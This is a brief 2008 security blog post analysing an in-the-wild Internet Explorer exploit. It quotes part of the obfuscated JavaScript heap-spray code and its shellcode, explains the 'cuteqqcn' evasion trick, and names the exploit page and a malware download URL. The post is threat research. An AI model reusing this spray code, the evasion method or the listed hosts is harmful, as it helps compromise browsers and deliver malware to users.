12/14/2008
another IE exploit and evasion in the wild
hackers are like wolves, when they see the meat, they all come after it - so don't be surprised
vip.4s3w.cn/vip/I7.htm
another IE exploit, but this evasion technique is so cute, take a look:
[snip]function spray(sc){var infect=unescape(sc.replace(/cuteqqcn/g,"x25x75"));var CuteSize=0x100000;var cuteLoadSize=infect.length*2;var szlong=CuteSize-
(cuteLoadSize+0x038);var retVal=unescape("%u0a0a%u0a0a");retVal=getSampleValue(retVal,szlong);aaablk=(0x0a0a0a0a-0x100000)/
CuteSize;zzchuck=new window['Array']();for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}}function getSampleValue(retVal,szlong){while(retVal.length*2<szlong){retVal+=retVal}retVal=retVal.substring(0,szlong/2);return retVal}var a1="cuteqqcn";spray("cuteqqcn9090cuteqqcn9090cuteqqcn9090"+a1+"6090cuteqqcn17ebcuteqqcn645ecuteqqcn30a1cuteqqcn0000cuteqqcn0500cuteqqcn0800
cuteqqcn0000cuteqqcnf88bcuteqqcn00b9cuteqqcn0004cuteqqcnf300[snip]
Well…maybe not…, just trying to evade detection by replacing %u with “cuteqqcn”
Anyway, the shellcode will download malware from
www-onlinedown.com/ie7/DUMete.exe (VT result)
and the number of viruscheckers not finding it is encouraging....
23:00 | Permalink | Comments (0) | Email this
| 
| 
del.icio.us
|
| 
Digg | 
Facebook
Post a comment